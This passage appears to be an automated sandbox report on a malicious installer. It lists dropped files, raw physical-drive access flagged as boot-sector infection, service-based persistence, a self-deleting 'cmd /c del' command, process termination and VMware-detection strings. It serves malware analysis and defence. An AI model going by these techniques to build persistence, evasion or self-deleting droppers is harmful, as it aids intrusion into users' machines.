                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\Wegame.exeJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Statr\kill.exeJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Statr\jli.dllJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\Lua51.dllJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\common.dllJump to dropped file
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0045EA47 __EH_prolog3_catch_GS,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,SimpleUString::operator=,?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ,?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ,?AddCrashReportHelperFile@CrashReportLoader@crash_report@@QAEHPB_W00K@Z,?AddCrashReportHelperFile@CrashReportLoader@crash_report@@QAEHPB_W00K@Z,?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ,?AddCrashReportHelperFile@CrashReportLoader@crash_report@@QAEHPB_W00K@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,WaitForSingleObject,?file_exists@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,??Bios_base@std@@QBE_NXZ,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?SetCrashInfo@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABUCrashInfo@234@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?GetLastLoginedUin@common@ierd_tgp@@YA_KXZ,FindWindowW,GetTickCount,PostMessageA,SimpleUString::operator=,?scale_path2absolute_path@common@ierd_tgp@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@@Z,GetPrivateProfileIntW,?get_log_instance@base@@YAPAVILogger@1@XZ,WritePrivateProfileStringW,SimpleUString::operator=,?scale_path2absolute_path@common@ierd_tgp@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z,GetTickCount,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?GetCurrentStage@Qos@qos@adapt_for_imports@ierd_tgp@@QAE?AW4ProcessStage@234@XZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z,OutputDebugStringA,Sleep,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,3_2_0045EA47
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0045F2B4 ?GetLastLoginedUin@common@ierd_tgp@@YA_KXZ,FindWindowW,GetTickCount,PostMessageA,SimpleUString::operator=,?scale_path2absolute_path@common@ierd_tgp@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@@Z,GetPrivateProfileIntW,?get_log_instance@base@@YAPAVILogger@1@XZ,WritePrivateProfileStringW,SimpleUString::operator=,?scale_path2absolute_path@common@ierd_tgp@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z,GetTickCount,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?GetCurrentStage@Qos@qos@adapt_for_imports@ierd_tgp@@QAE?AW4ProcessStage@234@XZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z,Sleep,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,3_2_0045F2B4
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046176A __EH_prolog3_GS,?GetUpdatedFilePath@silence_update@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PB_W0@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z,?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z,?remove_filename@path@filesystem@ierd_tgp@@QAEAAV123@XZ,GetPrivateProfileIntW,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,3_2_0046176A

                    Boot Survival

                    barindex
                    Contains functionality to infect the boot sector
                    Source: C:\Users\Wegame\Wegame.exeCode function: __EH_prolog3_GS,memset,__snprintf_s,CreateFileA,memset,memset,DeviceIoControl,memset,memset,memset,isalnum,isalnum,GetLastError,CloseHandle, \\.\PhysicalDrive%d3_2_6BD8477F
                    Source: C:\Users\Wegame\Wegame.exeCode function: __EH_prolog3_GS,memset,__snprintf_s,CreateFileA,memset,DeviceIoControl,memset,memset,DeviceIoControl,FindCloseChangeNotification, \\.\PhysicalDrive%d3_2_6BD84503
                    Drops PE files to the user root directory
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\adapt_for_imports.dllJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\Wegame.exeJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Statr\kill.exeJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Statr\jli.dllJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\Lua51.dllJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\common.dllJump to dropped file
                    Source: C:\ProgramData\RuntimeBroker.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Rsgiyy icwocqugJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035282E4 GetModuleFileNameA,ExpandEnvironmentStringsA,_strncoll,wsprintfA,CopyFileA,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlen,RegSetValueExA,6_2_035282E4

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Deletes itself after installation
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nul
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nulJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005D9B29 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_005D9B29
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00462478 __EH_prolog3_GS,?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z,GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,SimpleUString::operator=,?extract_name@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV34@@Z,OpenProcess,SetLastError,TerminateProcess,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,CloseHandle,Process32NextW,CloseHandle,3_2_00462478
                    Source: C:\Users\Wegame\Wegame.exeCode function: ?get_first_mac@common@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ,__EH_prolog3_catch_GS,GetAdaptersInfo,GetAdaptersInfo,?get_log_instance@base@@YAPAVILogger@1@XZ,__Init_thread_footer,3_2_6BD874A3
                    Source: C:\Users\Wegame\Wegame.exeCode function: memset,GetSystemDirectoryA,PathAppendA,LoadLibraryA,GetProcAddress,GetAdaptersInfo,memset,FreeLibrary,memset,3_2_6BD84E56
                    Source: C:\Users\Wegame\Wegame.exeWindow / User API: threadDelayed 6149Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeDropped PE file which has not been started: C:\Users\wm.exeJump to dropped file
                    Source: C:\Users\Statr\kill.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                    Source: C:\Users\Statr\kill.exeAPI coverage: 9.4 %
                    Source: C:\ProgramData\RuntimeBroker.exeAPI coverage: 6.0 %
                    Source: C:\Users\Wegame\Wegame.exe TID: 6932Thread sleep time: -30745s >= -30000sJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Users\Wegame\Wegame.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\ProgramData\RuntimeBroker.exeLast function: Thread delayed
                    Source: C:\ProgramData\RuntimeBroker.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\Wegame\Wegame.exeThread sleep count: Count: 6149 delay: -5Jump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00463A3A __EH_prolog3_GS,memset,GetModuleFileNameW,?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ,?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ,memset,FindFirstFileW,memset,wcsncpy_s,wcsncat_s,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindClose,3_2_00463A3A
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0045E17A __EH_prolog3_GS,memset,GetEnvironmentVariableW,?get_log_instance@base@@YAPAVILogger@1@XZ,memset,GetModuleFileNameW,wcsrchr,SimpleUString::operator=,memset,GetFileAttributesW,memset,memset,FindFirstFileW,memset,wcscmp,SimpleUString::operator=,wcscmp,wcscmp,FindNextFileW,FindClose,?get_log_instance@base@@YAPAVILogger@1@XZ,3_2_0045E17A
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0040F650 _invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,memset,FindFirstFileW,wcscpy_s,_invalid_parameter_noinfo_noreturn,3_2_0040F650
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0045DF3C __EH_prolog3_GS,memset,memset,FindFirstFileW,memset,wcscmp,wcscmp,memset,DeleteFileW,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,3_2_0045DF3C
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005F18B3 FindFirstFileExW,6_2_005F18B3
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_03522164 SHGetSpecialFolderPathA,FindFirstFileA,6_2_03522164
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_10001560 SHGetSpecialFolderPathA,FindFirstFileA,6_2_10001560
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00401125 GetSystemInfo,3_2_00401125
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: winPre2k.iso.0.drBinary or memory string: \VMware Toolbox.lnk
                    Source: winPre2k.iso.0.drBinary or memory string: http://www.vmware.com/support/reference/common/info_tools.html.
                    Source: winPre2k.iso.0.drBinary or memory string: http://www.vmware.com/0
                    Source: winPre2k.iso.0.drBinary or memory string: VMWARE_T.MSI;1
                    Source: winPre2k.iso.0.drBinary or memory string: s VMwareTray.exe
                    Source: wm.exe.0.drBinary or memory string: USER32GetSystemMetricsMonitorFromWindowMonitorFromRectMonitorFromPointEnumDisplayMonitorsEnumDisplayDevicesWGetMonitorInfoWGetMonitorInfoADISPLAYvmware.exevmapputil.dll@&!*@*@(msg.vmui.jumpList.taskName)Create a new virtual machine@&!*@*@(msg.vmui.jumpList.taskDescription)Run Workstation and create a new virtual machine--new-vmvmui.processJumplistTasks@&!*@*@(msg.vmui.library)Library@&!*@*@(msg.vmui.thumbnailBar)Thumbnail Barbora\apps\vmuiWin32\vmuiFrame.cppFailed to create the status bar: hr = 0x%lx: %s
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: %s\hgfs.dll
                    Source: winPre2k.iso.0.drBinary or memory string: t d'une application d'utilisateur VMwareVM_UninstallMemctlDriverNTD
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: toolbox/windows/hgfslib/hgfsServer.c
                    Source: winPre2k.iso.0.drBinary or memory string: 2) Doppelklicken Sie im Root-Verzeichnis des VMware Tools-CD-Image auf "VMware Tools.msi". Der Pfad lautet
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareService.exe9X
                    Source: winPre2k.iso.0.drBinary or memory string: vmmouse
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Tools.msiPX$
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: VMGuestLibInterface.html
                    Source: winPre2k.iso.0.drBinary or memory string: Installation du produit VMware
                    Source: winPre2k.iso.0.drBinary or memory string: PropertiesSetupType1;VMToolsStopRunningServices_toolsinstutil.dllISSetupFilesHelperNewBinary1NewBinary10NewBinary11NewBinary12NewBinary13NewBinary14NewBinary15NewBinary16NewBinary17NewBinary18NewBinary2NewBinary3NewBinary4NewBinary5NewBinary6NewBinary7NewBinary8NewBinary9SetAllUsers.dllNOT UpdateStartedDisableCancelUpdateStartedEnableBackFinishHideFinishText1ShowFinishText2RestContText1RestContText2ProgressType2="installed" And ((ACTION<>"INSTALL") OR (NOT ISENABLEDWUSFINISHDIALOG) OR (ISENABLEDWUSFINISHDIALOG And Installed))TextLine2ISENABLEDWUSFINISHDIALOG And NOT Installed And ACTION="INSTALL"CheckBoxUpdatesCheckForUpdatesTextSHOWLAUNCHPROGRAM="-1" And PROGRAMFILETOLAUNCHATEND <> "" And NOT Installed And NOT ISENABLEDWUSFINISHDIALOGCheckLaunchProgramSHOWLAUNCHREADME="-1" And READMEFILETOLAUNCHATEND <> "" And NOT Installed And NOT ISENABLEDWUSFINISHDIALOGCheckLaunchReadmeLaunchProgramTextLaunchReadmeTextProgressType2="uninstalled" And ((ACTION<>"INSTALL") OR (NOT ISENABLEDWUSFINISHDIALOG) OR (ISENABLEDWUSFINISHDIALOG And Installed))TextLine3UpdateTextLine1UpdateTextLine2UpdateTextLine3ProgressType2="installed"DlgDescProgressType1="Installing"DlgTitleProgressType3="installs"DlgTextProgressType1="Uninstalling"DlgTitle2ProgressType3="uninstalls"DlgText2ProgressType2="uninstalled"DlgDesc2SERIALNUMSHOWSerialLabelCustomerInformationDlgRadioGroupTextNOT PrivilegedProductState > 0RadioGroupSerialNumberInstalledChangeFolderCustomSetupDetailsInstallLabelSHOWCOPYRIGHT="No"CopyrightSHOWCOPYRIGHT="Yes"ProgressType0="Modify"ReadyToInstallProgressType0="Repair"ProgressType0="Install"DlgTitle3RESUMEPreselectedTextNOT RESUMEResumeTextCancelSetupSpawnDialogAdminNetworkLocationNewDialogNextReturnEndDialog[Suspend]{}ExitVM_LogEnd_ImmDoActionVM_UnmountImageFailure[LOGEND_TYPE]OKISCHECKFORPRODUCTUPDATES="1" And ISENABLEDWUSFINISHDIALOG And NOT ISREBOOTREQUIRED And NOT Installed And ACTION="INSTALL"CheckForProductUpdatesISCHECKFORPRODUCTUPDATES="1" And ISENABLEDWUSFINISHDIALOG And ISREBOOTREQUIRED And NOT Installed And ACTION="INSTALL"CheckForProductUpdatesOnReboot&SVGA=3 Or (REINSTALL And !SVGA=3)VM_DisplayManualVideoInstallSuccessfulInterruptedErrorNoErrorYesErrorAbortAErrorCancelCErrorIgnoreIErrorOkOErrorRetryRRadioSetupType = "Custom"RadioSetupType <> "Custom"RadioSetupType = "Complete"ALLAddLocalAdminChangeFolderResetDirectoryListUpUpDirectoryListNewNewFolderSetTargetPathOutOfNoRbDiskSpace <> 1InstallNowOutOfNoRbDiskSpace = 1OutOfSpaceBrowseVM_UnmountImageCancelNoNoDialog(SERIALNUMVALRETRYLIMIT) And (SERIALNUMVALRETRYLIMIT<0) And
                    Source: winPre2k.iso.0.drBinary or memory string: hlen Sie diese Option aus, wenn Sie diese virtuelle Maschine nur mit diesem VMware-Produkt ausf
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: vmGuestLib.h
                    Source: wm.exe.0.drBinary or memory string: noreply@vmware.com0
                    Source: wm.exe.0.drBinary or memory string: vmware.TabStripbora\apps\vmuiWin32\vmuiTabStrip.cppMS Shell Dlg 2
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: system32\hgfs1.dll
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmuiWin32.VCServerInstalled)Shared VMs cannot be used on a host that has VMware vCenter Server installed. To use shared VMs, uninstall vCenter Server and reinstall %s.VMware@&!*@*@(msg.vmuiWin32.WSNotInstalled)The %s installation seems to be corrupted. Try reinstalling the product. If the problem persists, contact %s support.CVMUIApp::OnConnectToLocalHostdAbort%s: Failed to connect to %s
                    Source: wm.exe.0.drBinary or memory string: The VMware Authorization Service is not running, so the virtual machine cannot be run in the background. You can power it off now.@&!*@*@(msg.vmuiAppVM.closeVMTab.failed)Failed to close the virtual machine "%s":
                    Source: Wegame.exeBinary or memory string: vmware
                    Source: winPre2k.iso.0.drBinary or memory string: vmmouse.sysNTen
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.collectSupportData.description)Select the virtual machines you want to collect support data for. When this process finishes (which may take several minutes), you can send the collected data to VMware for troubleshooting.
                    Source: winPre2k.iso.0.drBinary or memory string: s VMwareXferlogs.exe
                    Source: winPre2k.iso.0.drBinary or memory string: s!vmmouse.infNTja
                    Source: winPre2k.iso.0.drBinary or memory string: d:/build/ob/bora-1463223/bora/lib/productState/productState.cSOFTWARE\VMware, Inc.\%s%s:%d Buffer too small 0x%x
